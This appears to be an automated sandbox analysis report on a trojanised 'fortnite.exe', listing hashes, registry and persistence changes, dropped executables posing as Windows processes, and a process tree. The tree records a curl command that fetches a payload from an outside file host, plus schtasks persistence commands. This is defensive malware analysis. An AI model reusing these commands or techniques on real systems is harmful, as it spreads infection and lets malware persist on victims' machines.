Analysis
max time kernel: 151s
max time network: 127s
platform: windows7_x64
resource: win7-20241010-en
resource tags: arch:x64 arch:x86 image:win7-20241010-en locale:en-us os:windows7-x64 system
submitted: 17-11-2024 15:41
Static task: static1
Behavioral task: behavioral1 (Sample: fortnite.exe, Resource: win7-20241010-en)
Behavioral task: behavioral2 (Sample: fortnite.exe, Resource: win10v2004-20241007-en)
General
Target: fortnite.exe
Size: 1.4MB
MD5: fe46f964b97f65038b33d792041d5ae1
SHA1: 78c5f038a61bd6cc176aa6ba404ce3b1066dd3ac
SHA256: 5b1344b5474239635dbccf34f061111a440fdf309fc106ab7890902452d9e1f3
SHA512: 8f630383500a97b11174b39206bc63732c67e9ee58430f64efa708565ed9a01b737e133639f0a56f936fc9d13f0e234e655c1f2f9c3683931e8c1fa11a507d0f
SSDEEP: 24576:PFOaIhahEyuRAmfnkuGKFDflpC+bKlAtc06cd:tUhfnsGzH
Malware Config
Signatures
Modifies visibility of hidden/system files in Explorer (2 TTPs, 2 IoCs)
  description | ioc | Process
  Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | explorer.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | svchost.exe

Executes dropped EXE (6 IoCs)
  pid | Process
  1284 | fortnite.exe
  1796 | icsys.icn.exe
  2124 | explorer.exe
  1192 | spoolsv.exe
  2936 | svchost.exe
  2220 | spoolsv.exe

Loads dropped DLL (7 IoCs)
  pid | Process
  2044 | fortnite.exe
  2044 | fortnite.exe
  1560 | Process not Found
  1796 | icsys.icn.exe
  2124 | explorer.exe
  1192 | spoolsv.exe
  2936 | svchost.exe

Adds Run key to start application (2 TTPs, 4 IoCs)
  description | ioc | Process
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" | explorer.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" | explorer.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" | svchost.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" | svchost.exe

Drops file in System32 directory (2 IoCs)
  description | ioc | Process
  File opened for modification | C:\Windows\SysWOW64\explorer.exe | svchost.exe
  File opened for modification | C:\Windows\SysWOW64\explorer.exe | explorer.exe

Drops file in Windows directory (5 IoCs)
  description | ioc | Process
  File opened for modification | \??\c:\windows\resources\themes\explorer.exe | icsys.icn.exe
  File opened for modification | \??\c:\windows\resources\spoolsv.exe | explorer.exe
  File opened for modification | \??\c:\windows\resources\svchost.exe | spoolsv.exe
  File opened for modification | C:\Windows\Resources\tjud.exe | explorer.exe
  File opened for modification | C:\Windows\Resources\Themes\icsys.icn.exe | fortnite.exe

System Location Discovery: System Language Discovery (1 TTPs, 9 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | spoolsv.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | schtasks.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | icsys.icn.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | explorer.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | spoolsv.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | schtasks.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | schtasks.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | fortnite.exe

Scheduled Task/Job: Scheduled Task (1 TTPs, 3 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid | Process
  2844 | schtasks.exe
  2540 | schtasks.exe
  3008 | schtasks.exe

Suspicious behavior: EnumeratesProcesses (64 IoCs; repeated entries collapsed, count per process shown)
  pid | Process | entries
  2044 | fortnite.exe | 16
  1796 | icsys.icn.exe | 17
  2124 | explorer.exe | 16
  2936 | svchost.exe | 15

Suspicious behavior: GetForegroundWindowSpam (2 IoCs)
  pid | Process
  2124 | explorer.exe
  2936 | svchost.exe

Suspicious use of SetWindowsHookEx (12 IoCs)
  pid | Process
  2044 | fortnite.exe
  2044 | fortnite.exe
  1796 | icsys.icn.exe
  1796 | icsys.icn.exe
  2124 | explorer.exe
  2124 | explorer.exe
  1192 | spoolsv.exe
  1192 | spoolsv.exe
  2936 | svchost.exe
  2936 | svchost.exe
  2220 | spoolsv.exe
  2220 | spoolsv.exe

Suspicious use of WriteProcessMemory (46 IoCs; repeated entries collapsed, count per row shown)
  description | pid | Process | procid_target | entries
  PID 2044 wrote to memory of 1284 | 2044 | fortnite.exe | 30 | 4
  PID 2044 wrote to memory of 1796 | 2044 | fortnite.exe | 31 | 4
  PID 1796 wrote to memory of 2124 | 1796 | icsys.icn.exe | 33 | 4
  PID 2124 wrote to memory of 1192 | 2124 | explorer.exe | 34 | 4
  PID 1284 wrote to memory of 2916 | 1284 | fortnite.exe | 35 | 3
  PID 1284 wrote to memory of 2920 | 1284 | fortnite.exe | 36 | 3
  PID 1192 wrote to memory of 2936 | 1192 | spoolsv.exe | 37 | 4
  PID 2936 wrote to memory of 2220 | 2936 | svchost.exe | 38 | 4
  PID 2124 wrote to memory of 2740 | 2124 | explorer.exe | 39 | 4
  PID 2936 wrote to memory of 2844 | 2936 | svchost.exe | 40 | 4
  PID 2936 wrote to memory of 2540 | 2936 | svchost.exe | 44 | 4
  PID 2936 wrote to memory of 3008 | 2936 | svchost.exe | 46 | 4
Processes (indentation shows parent/child depth)

C:\Users\Admin\AppData\Local\Temp\fortnite.exe (PID 2044)
  command line: "C:\Users\Admin\AppData\Local\Temp\fortnite.exe"
  signatures: Loads dropped DLL; Drops file in Windows directory; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory

  \??\c:\users\admin\appdata\local\temp\fortnite.exe (PID 1284)
    command line: c:\users\admin\appdata\local\temp\fortnite.exe
    signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory

    C:\Windows\system32\cmd.exe (PID 2916)
      command line: C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/t3twl8.bin --output C:\Windows\Speech\physmeme.exe

    C:\Windows\system32\cmd.exe (PID 2920)
      command line: C:\Windows\system32\cmd.exe /c cls

  C:\Windows\Resources\Themes\icsys.icn.exe (PID 1796)
    command line: C:\Windows\Resources\Themes\icsys.icn.exe
    signatures: Executes dropped EXE; Loads dropped DLL; Drops file in Windows directory; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory

    \??\c:\windows\resources\themes\explorer.exe (PID 2124)
      command line: c:\windows\resources\themes\explorer.exe
      signatures: Modifies visibility of hidden/system files in Explorer; Executes dropped EXE; Loads dropped DLL; Adds Run key to start application; Drops file in System32 directory; Drops file in Windows directory; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: GetForegroundWindowSpam; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory

      \??\c:\windows\resources\spoolsv.exe (PID 1192)
        command line: c:\windows\resources\spoolsv.exe SE
        signatures: Executes dropped EXE; Loads dropped DLL; Drops file in Windows directory; System Location Discovery: System Language Discovery; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory

        \??\c:\windows\resources\svchost.exe (PID 2936)
          command line: c:\windows\resources\svchost.exe
          signatures: Modifies visibility of hidden/system files in Explorer; Executes dropped EXE; Loads dropped DLL; Adds Run key to start application; Drops file in System32 directory; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: GetForegroundWindowSpam; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory

          \??\c:\windows\resources\spoolsv.exe (PID 2220)
            command line: c:\windows\resources\spoolsv.exe PR
            signatures: Executes dropped EXE; System Location Discovery: System Language Discovery; Suspicious use of SetWindowsHookEx

          C:\Windows\SysWOW64\schtasks.exe (PID 2844)
            command line: schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 15:44 /f
            signatures: System Location Discovery: System Language Discovery; Scheduled Task/Job: Scheduled Task

          C:\Windows\SysWOW64\schtasks.exe (PID 2540)
            command line: schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 15:45 /f
            signatures: System Location Discovery: System Language Discovery; Scheduled Task/Job: Scheduled Task

          C:\Windows\SysWOW64\schtasks.exe (PID 3008)
            command line: schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 15:46 /f
            signatures: System Location Discovery: System Language Discovery; Scheduled Task/Job: Scheduled Task

      C:\Windows\Explorer.exe (PID 2740)
        command line: C:\Windows\Explorer.exe
Network
MITRE ATT&CK Enterprise v15
Persistence: Boot or Logon Autostart Execution (1) > Registry Run Keys / Startup Folder (1); Scheduled Task/Job (1) > Scheduled Task (1)
Privilege Escalation: Boot or Logon Autostart Execution (1) > Registry Run Keys / Startup Folder (1); Scheduled Task/Job (1) > Scheduled Task (1)
Downloads

Filesize: 135KB
MD5: a711f0925f42a810499b8963f248f81d
SHA1: e2d108438a52befe6ff8c76f830373224276ebd0
SHA256: ca0c9438d7e0bb0abe5cd9ea49028d9bf53de2394d63991a036448eec36adcc7
SHA512: fc374f708ae6cb6fb558fcbcca9a30e3e0d4764f77cb3208a553815b063c762ab97d9f1aa2eafe5cdad36f04a3d086bce2d58767ff52b5b44c13775f7ee42634

Filesize: 1.2MB
MD5: 3287792eb50754ea8b3639bca36a8a99
SHA1: d46b073edbbfcd8027d2df2b1ccb93f90bec3319
SHA256: 9c3dd5e7ce8aa6114c6d881a64eefb47f5e6557bbc84cbfa705318674b43fecc
SHA512: fada9632e159e6225997c8c6d67fb09f4ce48c1c444d0205ceb8a4004f7006eb7c55ce2823d1f33672bbea36d29e6111cd5021b63ee2fbd3f6dbf2847ce78b38

Filesize: 135KB
MD5: db2a3be4d0ba7fbe7984689f57969053
SHA1: 22eeabb26614ba2a32b0869ae544c67c02f9262b
SHA256: 2055a054d6084815d3e23fdc1cfa776bea0cf21a2eb6194a0d453eec3dead956
SHA512: 7b3cab337dfe217824ad754c02561f2bdb82eb92d3462503212870e4adb2f6b1e10392e3dc127883a3ef8c39e1c0d9ed946609831c114cc42746fa0f680390d4

Filesize: 135KB
MD5: 49af1e57561db06cf5460d2bd4bfac27
SHA1: 06fd729a5828e737607618caac0b88c820f304cf
SHA256: fa61bb735e38be8e69149c644c92a270dd5f805bbf2cf07db57fa090845be4bb
SHA512: 78c57b3c3410c37d998ea37a8c624d4b6e64f646f6e2aa63cbcc947b9a654411dc20e29109cca8e95e5d8ca75966bfd962ed160fcb16a583fc7e5b62439d7385

Filesize: 135KB
MD5: a74cc12915ee1a4baee804ef46526b9e
SHA1: ac979475cda92036255b5dae36fef12bda2e7539
SHA256: 1b249b1b4494cb278cc37dde36799a89898650455493a31457aa4538fcfe5945
SHA512: 896322b4cbfb52e445ff3e7341dd19e70706bf6826b4425120911dae3898572a8ac295067afecc1d87006a5c07153640ef4f106167c90d470b3755fb3acfd1a7